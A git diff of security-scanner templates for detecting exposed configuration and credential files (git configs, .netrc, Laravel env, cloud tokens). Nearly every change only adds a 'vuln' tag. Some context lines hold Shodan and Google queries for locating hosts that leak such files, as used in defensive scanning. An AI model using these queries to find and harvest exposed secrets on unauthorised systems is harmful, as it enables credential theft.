1dc7a6ca949..b322e214e9e 100644 --- a/http/exposures/configs/exposed-svn.yaml +++ b/http/exposures/configs/exposed-svn.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,svn + tags: config,exposure,svn,vuln http: - method: GET diff --git a/http/exposures/configs/exposed-vscode.yaml b/http/exposures/configs/exposed-vscode.yaml index 1e6a8b93900..035520eecce 100644 --- a/http/exposures/configs/exposed-vscode.yaml +++ b/http/exposures/configs/exposed-vscode.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: vscode,exposure + tags: vscode,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/fastcgi-config.yaml b/http/exposures/configs/fastcgi-config.yaml index 1300f1770f8..c1ecae828a7 100644 --- a/http/exposures/configs/fastcgi-config.yaml +++ b/http/exposures/configs/fastcgi-config.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 2 - tags: fastcgi,config,exposure + tags: fastcgi,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/filestash-admin-config.yaml b/http/exposures/configs/filestash-admin-config.yaml index 11e300c0bbb..8787222a569 100644 --- a/http/exposures/configs/filestash-admin-config.yaml +++ b/http/exposures/configs/filestash-admin-config.yaml @@ -14,7 +14,7 @@ info: vendor: filestash product: filestash shodan-query: html:"Admin Console" - tags: exposure,filestash,config + tags: exposure,filestash,config,vuln http: - method: GET diff --git a/http/exposures/configs/firebase-config-exposure.yaml b/http/exposures/configs/firebase-config-exposure.yaml index b64005949c8..76d9a591def 100644 --- a/http/exposures/configs/firebase-config-exposure.yaml +++ b/http/exposures/configs/firebase-config-exposure.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 3 - tags: firebase,exposure,config + tags: firebase,exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/ftp-credentials-exposure.yaml b/http/exposures/configs/ftp-credentials-exposure.yaml index 3b862cd6649..978edd91686 100644 --- a/http/exposures/configs/ftp-credentials-exposure.yaml +++ b/http/exposures/configs/ftp-credentials-exposure.yaml @@ -16,7 +16,7 @@ info: google-query: inurl:"/ftpsync.settings" product: wing_ftp_server vendor: wftpserver - tags: config,ftp,exposure + tags: config,ftp,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/gcloud-config-default.yaml b/http/exposures/configs/gcloud-config-default.yaml index b822ea247e3..01a269fcbb9 100644 --- a/http/exposures/configs/gcloud-config-default.yaml +++ b/http/exposures/configs/gcloud-config-default.yaml @@ -17,7 +17,7 @@ info: shodan-query: html:"access_tokens.db" product: cloud_platform vendor: google - tags: google,cloud,devops,exposure + tags: google,cloud,devops,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/git-config-nginxoffbyslash.yaml b/http/exposures/configs/git-config-nginxoffbyslash.yaml index 87216fc7032..e78c8428ebc 100644 --- a/http/exposures/configs/git-config-nginxoffbyslash.yaml +++ b/http/exposures/configs/git-config-nginxoffbyslash.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 metadata: max-request: 10 - tags: config,exposure,nginx + tags: config,exposure,nginx,vuln http: - method: GET diff --git a/http/exposures/configs/git-config.yaml b/http/exposures/configs/git-config.yaml index 694594b3a5f..092ffd5fb5b 100644 --- a/http/exposures/configs/git-config.yaml +++ b/http/exposures/configs/git-config.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,git,exposure + tags: config,git,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/git-credentials-disclosure.yaml b/http/exposures/configs/git-credentials-disclosure.yaml index af5f38999c2..7ae44009638 100644 --- a/http/exposures/configs/git-credentials-disclosure.yaml +++ b/http/exposures/configs/git-credentials-disclosure.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: exposure,config + tags: exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/github-workflows-disclosure.yaml b/http/exposures/configs/github-workflows-disclosure.yaml index 40cdd52851e..91264500f2f 100644 --- a/http/exposures/configs/github-workflows-disclosure.yaml +++ b/http/exposures/configs/github-workflows-disclosure.yaml @@ -9,7 +9,7 @@ info: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/github-workflows-disclosure.json metadata: max-request: 27 - tags: exposure,config + tags: exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/gmail-api-client-secrets.yaml b/http/exposures/configs/gmail-api-client-secrets.yaml index e4d124e4a72..9e76a5ba068 100644 --- a/http/exposures/configs/gmail-api-client-secrets.yaml +++ b/http/exposures/configs/gmail-api-client-secrets.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/golangci-config.yaml b/http/exposures/configs/golangci-config.yaml index 80d0970c8bc..4ce41a0d594 100644 --- a/http/exposures/configs/golangci-config.yaml +++ b/http/exposures/configs/golangci-config.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 4 github-query: filename:golangci.yml - tags: exposure,golang,devops,cicd + tags: exposure,golang,devops,cicd,vuln http: - method: GET diff --git a/http/exposures/configs/gruntfile-exposure.yaml b/http/exposures/configs/gruntfile-exposure.yaml index 2209eb71862..85c06f84703 100644 --- a/http/exposures/configs/gruntfile-exposure.yaml +++ b/http/exposures/configs/gruntfile-exposure.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/guard-config.yaml b/http/exposures/configs/guard-config.yaml index 888bc4c6dd2..6588935af87 100644 --- a/http/exposures/configs/guard-config.yaml +++ b/http/exposures/configs/guard-config.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 shodan-query: html:"Guardfile" - tags: exposure,file,guard,config + tags: exposure,file,guard,config,vuln http: - method: GET diff --git a/http/exposures/configs/hikvision-info-leak.yaml b/http/exposures/configs/hikvision-info-leak.yaml index de3be5bb1ac..54f19c27f54 100644 --- a/http/exposures/configs/hikvision-info-leak.yaml +++ b/http/exposures/configs/hikvision-info-leak.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: exposure,config,hikvision + tags: exposure,config,hikvision,vuln http: - method: GET diff --git a/http/exposures/configs/honeywell-scada-config.yaml b/http/exposures/configs/honeywell-scada-config.yaml index 6226290da73..0e9192e5404 100644 --- a/http/exposures/configs/honeywell-scada-config.yaml +++ b/http/exposures/configs/honeywell-scada-config.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/exploits/44734 metadata: max-request: 1 - tags: scada,config,exposure,edb + tags: scada,config,exposure,edb,vuln http: - method: GET diff --git a/http/exposures/configs/hp-ilo-serial-key-disclosure.yaml b/http/exposures/configs/hp-ilo-serial-key-disclosure.yaml index 052e88bef20..ecf290a904c 100644 --- a/http/exposures/configs/hp-ilo-serial-key-disclosure.yaml +++ b/http/exposures/configs/hp-ilo-serial-key-disclosure.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: exposure,config + tags: exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/htpasswd-detection.yaml b/http/exposures/configs/htpasswd-detection.yaml index dadd9abd577..aa9231f1a60 100644 --- a/http/exposures/configs/htpasswd-detection.yaml +++ b/http/exposures/configs/htpasswd-detection.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure + tags: config,exposure,discovery http: - method: GET diff --git a/http/exposures/configs/httpd-config.yaml b/http/exposures/configs/httpd-config.yaml index 4a5f7386a66..1dab818702f 100644 --- a/http/exposures/configs/httpd-config.yaml +++ b/http/exposures/configs/httpd-config.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,httpd + tags: config,exposure,httpd,vuln http: - method: GET diff --git a/http/exposures/configs/javascript-env-config.yaml b/http/exposures/configs/javascript-env-config.yaml index 13bc7c07556..e4a73077216 100644 --- a/http/exposures/configs/javascript-env-config.yaml +++ b/http/exposures/configs/javascript-env-config.yaml @@ -7,7 +7,7 @@ info: description: Multiple common JavaScript environment configuration files were detected. metadata: max-request: 6 - tags: javascript,config,exposure + tags: javascript,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/jetbrains-datasources.yaml b/http/exposures/configs/jetbrains-datasources.yaml index 1a4e10ff6f5..e7b51baff86 100644 --- a/http/exposures/configs/jetbrains-datasources.yaml +++ b/http/exposures/configs/jetbrains-datasources.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,jetbrains + tags: config,exposure,jetbrains,vuln http: - method: GET diff --git a/http/exposures/configs/jkstatus-manager.yaml b/http/exposures/configs/jkstatus-manager.yaml index 55a296f7443..d5a9fdb57b2 100644 --- a/http/exposures/configs/jkstatus-manager.yaml +++ b/http/exposures/configs/jkstatus-manager.yaml @@ -16,7 +16,7 @@ info: vendor: apache product: tomcat shodan-query: html:"JK Status Manager" - tags: config,jk,status,exposure + tags: config,jk,status,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/joomla-config-dist-file.yaml b/http/exposures/configs/joomla-config-dist-file.yaml index 41edbb4997d..2aedd57b88c 100644 --- a/http/exposures/configs/joomla-config-dist-file.yaml +++ b/http/exposures/configs/joomla-config-dist-file.yaml @@ -7,7 +7,7 @@ info: description: Joomla! configuration.php-dist file was detected. metadata: max-request: 1 - tags: config,exposure,joomla + tags: config,exposure,joomla,vuln http: - method: GET diff --git a/http/exposures/configs/jsconfig-json.yaml b/http/exposures/configs/jsconfig-json.yaml index 42354e029df..5d8c949f711 100644 --- a/http/exposures/configs/jsconfig-json.yaml +++ b/http/exposures/configs/jsconfig-json.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: html:"jsconfig.json" - tags: devops,exposure,jsconfig,config + tags: devops,exposure,jsconfig,config,vuln http: - method: GET diff --git a/http/exposures/configs/karma-config-js.yaml b/http/exposures/configs/karma-config-js.yaml index 8000ff111a8..7a0c14ba531 100644 --- a/http/exposures/configs/karma-config-js.yaml +++ b/http/exposures/configs/karma-config-js.yaml @@ -16,7 +16,7 @@ info: shodan-query: html:"karma.conf.js" product: karma vendor: karma_project - tags: config,exposure,devops + tags: config,exposure,devops,vuln http: - method: GET diff --git a/http/exposures/configs/keycloak-openid-config.yaml b/http/exposures/configs/keycloak-openid-config.yaml index 1c391f44e05..06aa5102236 100644 --- a/http/exposures/configs/keycloak-openid-config.yaml +++ b/http/exposures/configs/keycloak-openid-config.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: keycloak,config,exposure + tags: keycloak,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/kubernetes-kustomization-disclosure.yaml b/http/exposures/configs/kubernetes-kustomization-disclosure.yaml index 56e5b758416..ca42a1a5f50 100644 --- a/http/exposures/configs/kubernetes-kustomization-disclosure.yaml +++ b/http/exposures/configs/kubernetes-kustomization-disclosure.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: exposure,config,kubernetes + tags: exposure,config,kubernetes,vuln http: - method: GET diff --git a/http/exposures/configs/kyan-credential-exposure.yaml b/http/exposures/configs/kyan-credential-exposure.yaml index 46c34ffbdd1..bddaffdd6a9 100644 --- a/http/exposures/configs/kyan-credential-exposure.yaml +++ b/http/exposures/configs/kyan-credential-exposure.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: kyan,exposure,config + tags: kyan,exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/laravel-env.yaml b/http/exposures/configs/laravel-env.yaml index cd486f88dda..337f09c19f9 100644 --- a/http/exposures/configs/laravel-env.yaml +++ b/http/exposures/configs/laravel-env.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-522 metadata: max-request: 22 - tags: config,exposure,laravel + tags: config,exposure,laravel,vuln http: - method: GET diff --git a/http/exposures/configs/lvmeng-uts-disclosure.yaml b/http/exposures/configs/lvmeng-uts-disclosure.yaml index 4979bf5a167..ffb5a2a9bd6 100644 --- a/http/exposures/configs/lvmeng-uts-disclosure.yaml +++ b/http/exposures/configs/lvmeng-uts-disclosure.yaml @@ -7,7 +7,7 @@ info: description: Lvmeng UTS was discovered. metadata: max-request: 1 - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/magento-config-disclosure.yaml b/http/exposures/configs/magento-config-disclosure.yaml index dbac5cbd973..3e61812b769 100644 --- a/http/exposures/configs/magento-config-disclosure.yaml +++ b/http/exposures/configs/magento-config-disclosure.yaml @@ -19,7 +19,7 @@ info: shodan-query: http.component:"Magento" product: magento vendor: magento - tags: magento,exposure,credential,config + tags: magento,exposure,credential,config,vuln http: - method: GET diff --git a/http/exposures/configs/magicinfo-config-exposure.yaml b/http/exposures/configs/magicinfo-config-exposure.yaml index 434303bf989..fdfd90be99d 100644 --- a/http/exposures/configs/magicinfo-config-exposure.yaml +++ b/http/exposures/configs/magicinfo-config-exposure.yaml @@ -13,7 +13,7 @@ info: product: magicinfo_9_server shodan-query: title:"MagicINFO" fofa-query: title:"MagicINFO" - tags: config,exposure,magicinfo + tags: config,exposure,magicinfo,vuln http: - method: GET diff --git a/http/exposures/configs/mercurial-hgignore.yaml b/http/exposures/configs/mercurial-hgignore.yaml index 6bb04faecf7..8028b20b435 100644 --- a/http/exposures/configs/mercurial-hgignore.yaml +++ b/http/exposures/configs/mercurial-hgignore.yaml @@ -18,7 +18,7 @@ info: shodan-query: html:"hgignore" product: mercurial vendor: mercurial - tags: exposure,hgignore,config,mercurial + tags: exposure,hgignore,config,mercurial,vuln http: - method: GET diff --git a/http/exposures/configs/msmtp-config.yaml b/http/exposures/configs/msmtp-config.yaml index 22185007b0f..fb330532afb 100644 --- a/http/exposures/configs/msmtp-config.yaml +++ b/http/exposures/configs/msmtp-config.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: exposure,msmtp + tags: exposure,msmtp,vuln http: - method: GET diff --git a/http/exposures/configs/n8n-config.yaml b/http/exposures/configs/n8n-config.yaml index c94c6d0fd7a..baaab757a10 100644 --- a/http/exposures/configs/n8n-config.yaml +++ b/http/exposures/configs/n8n-config.yaml @@ -15,7 +15,7 @@ info: vendor: n8n product: n8n shodan-query: http.html:"N8n" - tags: n8n,config,exposed + tags: n8n,config,exposed,vuln http: - raw: diff --git a/http/exposures/configs/nagios-status-page.yaml b/http/exposures/configs/nagios-status-page.yaml index ae9773ec613..aa0c3928ba9 100644 --- a/http/exposures/configs/nagios-status-page.yaml +++ b/http/exposures/configs/nagios-status-page.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 3 - tags: exposure,nagios,status,edb + tags: exposure,nagios,status,edb,vuln http: - method: GET diff --git a/http/exposures/configs/neo4j-neodash-config.yaml b/http/exposures/configs/neo4j-neodash-config.yaml index 80fbca516f6..8e0ba371e05 100644 --- a/http/exposures/configs/neo4j-neodash-config.yaml +++ b/http/exposures/configs/neo4j-neodash-config.yaml @@ -14,7 +14,7 @@ info: vendor: neo4j product: neodash shodan-query: title:"NeoDash" - tags: config,exposure,neodash,neo4j + tags: config,exposure,neodash,neo4j,vuln http: - method: GET diff --git a/http/exposures/configs/netbeans-config.yaml b/http/exposures/configs/netbeans-config.yaml index 69c900ee887..84b3d036edb 100644 --- a/http/exposures/configs/netbeans-config.yaml +++ b/http/exposures/configs/netbeans-config.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: netbeans,config,exposure + tags: netbeans,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/netrc.yaml b/http/exposures/configs/netrc.yaml index 2a487ccd27b..a0b3da37a56 100644 --- a/http/exposures/configs/netrc.yaml +++ b/http/exposures/configs/netrc.yaml @@ -9,7 +9,7 @@ info: - https://www.gnu.org/software/inetutils/manual/html_node/The-_002enetrc-file.html metadata: max-request: 2 - tags: netrc,config,exposure + tags: netrc,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/nextjs-vite-public-env.yaml b/http/exposures/configs/nextjs-vite-public-env.yaml index d082a1e69c7..dda2d50d02e 100644 --- a/http/exposures/configs/nextjs-vite-public-env.yaml +++ b/http/exposures/configs/nextjs-vite-public-env.yaml @@ -12,7 +12,7 @@ info: - https://supabase.com/docs/guides/api#api-keys metadata: verified: true - tags: exposure,env,nextjs,vite,supabase + tags: exposure,env,nextjs,vite,supabase,vuln http: - method: GET diff --git a/http/exposures/configs/nginx-config.yaml b/http/exposures/configs/nginx-config.yaml index a17b3480dde..222092b9710 100644 --- a/http/exposures/configs/nginx-config.yaml +++ b/http/exposures/configs/nginx-config.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,nginx + tags: config,exposure,nginx,vuln http: - method: GET diff --git a/http/exposures/configs/nocobase-config.yaml b/http/exposures/configs/nocobase-config.yaml index 4a607fd75bf..7f49fcab201 100644 --- a/http/exposures/configs/nocobase-config.yaml +++ b/http/exposures/configs/nocobase-config.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: nocobase product: nocobase - tags: nocobase,config,exposed + tags: nocobase,config,exposed,vuln http: - raw: diff --git a/http/exposures/configs/opcache-status-exposure.yaml b/http/exposures/configs/opcache-status-exposure.yaml index 7b715a463d0..d0fcefa07f5 100644 --- a/http/exposures/configs/opcache-status-exposure.yaml +++ b/http/exposures/configs/opcache-status-exposure.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 3 - tags: config,exposure,status + tags: config,exposure,status,vuln http: - method: GET diff --git a/http/exposures/configs/openmetadata-admin-userenum.yaml b/http/exposures/configs/openmetadata-admin-userenum.yaml index 68ca81e1c20..575f0d7db6d 100644 --- a/http/exposures/configs/openmetadata-admin-userenum.yaml +++ b/http/exposures/configs/openmetadata-admin-userenum.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"OpenMetadata" vendor: open-metadata product: openmetadata - tags: openmetadata,open-metadata,userenum + tags: openmetadata,open-metadata,userenum,discovery http: - raw: diff --git a/http/exposures/configs/oracle-cgi-printenv.yaml b/http/exposures/configs/oracle-cgi-printenv.yaml index e1a30731160..a24b4044f03 100644 --- a/http/exposures/configs/oracle-cgi-printenv.yaml +++ b/http/exposures/configs/oracle-cgi-printenv.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: exposure,oracle,config + tags: exposure,oracle,config,vuln http: - method: GET diff --git a/http/exposures/configs/oracle-ebs-credentials.yaml b/http/exposures/configs/oracle-ebs-credentials.yaml index 7d1e43126ee..33022c8e69a 100644 --- a/http/exposures/configs/oracle-ebs-credentials.yaml +++ b/http/exposures/configs/oracle-ebs-credentials.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,oracle + tags: config,exposure,oracle,vuln http: - method: GET diff --git a/http/exposures/configs/ovpn-config-exposed.yaml b/http/exposures/configs/ovpn-config-exposed.yaml index 04d16ea1ba0..197ba97c477 100644 --- a/http/exposures/configs/ovpn-config-exposed.yaml +++ b/http/exposures/configs/ovpn-config-exposed.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.title:"OVPN Config Download" product: connect vendor: openvpn - tags: config,ovpn,exposure + tags: config,ovpn,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/owncloud-config.yaml b/http/exposures/configs/owncloud-config.yaml index 985edcff1a4..d27ecfb4796 100644 --- a/http/exposures/configs/owncloud-config.yaml +++ b/http/exposures/configs/owncloud-config.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/package-json.yaml b/http/exposures/configs/package-json.yaml index 51fd8b0cae8..c254125ef33 100644 --- a/http/exposures/configs/package-json.yaml +++ b/http/exposures/configs/package-json.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 2 - tags: config,exposure,node,npm + tags: config,exposure,node,npm,vuln http: - method: GET diff --git a/http/exposures/configs/parameters-config.yaml b/http/exposures/configs/parameters-config.yaml index 5e8d0b03cf6..d5348f69003 100644 --- a/http/exposures/configs/parameters-config.yaml +++ b/http/exposures/configs/parameters-config.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 4 shodan-query: html:"parameters.yml" - tags: exposure,cloud,devops + tags: exposure,cloud,devops,vuln http: - method: GET diff --git a/http/exposures/configs/perl-status.yaml b/http/exposures/configs/perl-status.yaml index 368b8f4a362..bab99d79eda 100644 --- a/http/exposures/configs/perl-status.yaml +++ b/http/exposures/configs/perl-status.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,apache,status + tags: config,exposure,apache,status,vuln http: - method: GET diff --git a/http/exposures/configs/phalcon-framework-source.yaml b/http/exposures/configs/phalcon-framework-source.yaml index 8ce67fb0a5d..1a84b4852d5 100644 --- a/http/exposures/configs/phalcon-framework-source.yaml +++ b/http/exposures/configs/phalcon-framework-source.yaml @@ -7,7 +7,7 @@ info: description: Phalcon Framework source code was discovered. metadata: max-request: 1 - tags: exposure,debug,phalcon + tags: exposure,debug,phalcon,vuln http: - method: GET diff --git a/http/exposures/configs/phinx-config.yaml b/http/exposures/configs/phinx-config.yaml index 5f90ba64e71..d15156bc5c2 100644 --- a/http/exposures/configs/phinx-config.yaml +++ b/http/exposures/configs/phinx-config.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: html:"phinx.yml" - tags: devops,exposure,files + tags: devops,exposure,files,vuln http: - method: GET diff --git a/http/exposures/configs/php-fpm-config.yaml b/http/exposures/configs/php-fpm-config.yaml index 0d13059d774..9a56fdbeb24 100644 --- a/http/exposures/configs/php-fpm-config.yaml +++ b/http/exposures/configs/php-fpm-config.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,php + tags: config,exposure,php,vuln http: - method: GET diff --git a/http/exposures/configs/phpcs-config.yaml b/http/exposures/configs/phpcs-config.yaml index 0cce371b39e..83f5219fe2f 100644 --- a/http/exposures/configs/phpcs-config.yaml +++ b/http/exposures/configs/phpcs-config.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 shodan-query: html:"phpcs.xml" - tags: devops,exposure,php,phpcs + tags: devops,exposure,php,phpcs,vuln http: - method: GET diff --git a/http/exposures/configs/phpinfo-files.yaml b/http/exposures/configs/phpinfo-files.yaml index 1803834784b..8fafef1d8cf 100644 --- a/http/exposures/configs/phpinfo-files.yaml +++ b/http/exposures/configs/phpinfo-files.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 25 - tags: config,exposure,phpinfo + tags: config,exposure,phpinfo,vuln http: - method: GET diff --git a/http/exposures/configs/phpsec-config.yaml b/http/exposures/configs/phpsec-config.yaml index e92d2a84398..aa24ea0e92d 100644 --- a/http/exposures/configs/phpsec-config.yaml +++ b/http/exposures/configs/phpsec-config.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 2 shodan-query: html:"phpspec.yml" - tags: exposure,phpsec,php,devops,cicd + tags: exposure,phpsec,php,devops,cicd,vuln http: - method: GET diff --git a/http/exposures/configs/phpstan-config.yaml b/http/exposures/configs/phpstan-config.yaml index 010db3acdfe..893cb74bbc0 100644 --- a/http/exposures/configs/phpstan-config.yaml +++ b/http/exposures/configs/phpstan-config.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: html:"phpstan.neon" - tags: devops,exposure + tags: devops,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/phpsys-info.yaml b/http/exposures/configs/phpsys-info.yaml index a26d6d8b3c6..26183f17f14 100644 --- a/http/exposures/configs/phpsys-info.yaml +++ b/http/exposures/configs/phpsys-info.yaml @@ -15,7 +15,7 @@ info: vendor: phpsysinfo product: phpsysinfo shodan-query: html:"phpSysInfo" - tags: config,exposure,phpsysinfo + tags: config,exposure,phpsysinfo,vuln http: - method: GET diff --git a/http/exposures/configs/pipfile-config.yaml b/http/exposures/configs/pipfile-config.yaml index a21110a0b95..23b145b68f5 100644 --- a/http/exposures/configs/pipfile-config.yaml +++ b/http/exposures/configs/pipfile-config.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: html:"Pipfile" - tags: exposure,pip,devops,cicd + tags: exposure,pip,devops,cicd,vuln http: - method: GET diff --git a/http/exposures/configs/platformio-ini.yaml b/http/exposures/configs/platformio-ini.yaml index 09d94a3a172..371ac1906f4 100644 --- a/http/exposures/configs/platformio-ini.yaml +++ b/http/exposures/configs/platformio-ini.yaml @@ -12,7 +12,7 @@ info: max-request: 1 google-query: inurl:"/platformio.ini" github-query: '[platformio] language:INI' - tags: config,exposure,platformio + tags: config,exposure,platformio,vuln http: - method: GET diff --git a/http/exposures/configs/plesk-stat.yaml b/http/exposures/configs/plesk-stat.yaml index d942d8c8447..7aa37b5d784 100644 --- a/http/exposures/configs/plesk-stat.yaml +++ b/http/exposures/configs/plesk-stat.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,plesk + tags: config,exposure,plesk,vuln http: - method: GET diff --git a/http/exposures/configs/pre-commit-config.yaml b/http/exposures/configs/pre-commit-config.yaml index 306183d443c..828382ccbbb 100644 --- a/http/exposures/configs/pre-commit-config.yaml +++ b/http/exposures/configs/pre-commit-config.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 2 - tags: exposure,devops,config,cicd + tags: exposure,devops,config,cicd,vuln http: - method: GET diff --git a/http/exposures/configs/procfile-config.yaml b/http/exposures/configs/procfile-config.yaml index 4fb5b642927..b50952be89e 100644 --- a/http/exposures/configs/procfile-config.yaml +++ b/http/exposures/configs/procfile-config.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: html:"Procfile" - tags: devops,exposure,config + tags: devops,exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/proftpd-config.yaml b/http/exposures/configs/proftpd-config.yaml index dd34d177818..d2afd19d1bc 100644 --- a/http/exposures/configs/proftpd-config.yaml +++ b/http/exposures/configs/proftpd-config.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,proftpd + tags: config,exposure,proftpd,vuln http: - method: GET diff --git a/http/exposures/configs/prometheus-metrics.yaml b/http/exposures/configs/prometheus-metrics.yaml index b05958eab42..e00855d3e5a 100644 --- a/http/exposures/configs/prometheus-metrics.yaml +++ b/http/exposures/configs/prometheus-metrics.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: exposure,prometheus,hackerone,config + tags: exposure,prometheus,hackerone,config,vuln http: - method: GET diff --git a/http/exposures/configs/protractor-config.yaml b/http/exposures/configs/protractor-config.yaml index 189f1290aa7..6b187500d9f 100644 --- a/http/exposures/configs/protractor-config.yaml +++ b/http/exposures/configs/protractor-config.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"protractor.conf.js" - tags: devops,exposure,protractor,config + tags: devops,exposure,protractor,config,vuln http: - method: GET diff --git a/http/exposures/configs/proxy-wpad-exposure.yaml b/http/exposures/configs/proxy-wpad-exposure.yaml index 53f5723d811..0269fa374e2 100644 --- a/http/exposures/configs/proxy-wpad-exposure.yaml +++ b/http/exposures/configs/proxy-wpad-exposure.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: html:"wpad.dat" - tags: config,exposure,proxy + tags: config,exposure,proxy,vuln http: - method: GET diff --git a/http/exposures/configs/psalm-config.yaml b/http/exposures/configs/psalm-config.yaml index 4c3951e26aa..ec1f769ddaa 100644 --- a/http/exposures/configs/psalm-config.yaml +++ b/http/exposures/configs/psalm-config.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 shodan-query: html:"psalm.xml" - tags: devops,exposure,php,psalm,config + tags: devops,exposure,php,psalm,config,vuln http: - method: GET diff --git a/http/exposures/configs/pubspec-config.yaml b/http/exposures/configs/pubspec-config.yaml index 9cd102edb07..36e58141af0 100644 --- a/http/exposures/configs/pubspec-config.yaml +++ b/http/exposures/configs/pubspec-config.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 2 shodan-query: html:"pubspec.yaml" - tags: exposure,devops,pubsec,config,cicd + tags: exposure,devops,pubsec,config,cicd,vuln http: - method: GET diff --git a/http/exposures/configs/pyproject-toml.yaml b/http/exposures/configs/pyproject-toml.yaml index 7f2ea9a3d77..1f0b8566ffe 100644 --- a/http/exposures/configs/pyproject-toml.yaml +++ b/http/exposures/configs/pyproject-toml.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: html:"pyproject.toml" - tags: exposure,pyproject,pip,devops,cicd + tags: exposure,pyproject,pip,devops,cicd,vuln http: - method: GET diff --git a/http/exposures/configs/qdpm-info-leak.yaml b/http/exposures/configs/qdpm-info-leak.yaml index a90f884713d..07a43787717 100644 --- a/http/exposures/configs/qdpm-info-leak.yaml +++ b/http/exposures/configs/qdpm-info-leak.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/exploits/50176 metadata: max-request: 1 - tags: qdpm,exposure,edb + tags: qdpm,exposure,edb,vuln http: - method: GET diff --git a/http/exposures/configs/rackup-config-ru.yaml b/http/exposures/configs/rackup-config-ru.yaml index 9933358b3e7..182ece8c4b9 100644 --- a/http/exposures/configs/rackup-config-ru.yaml 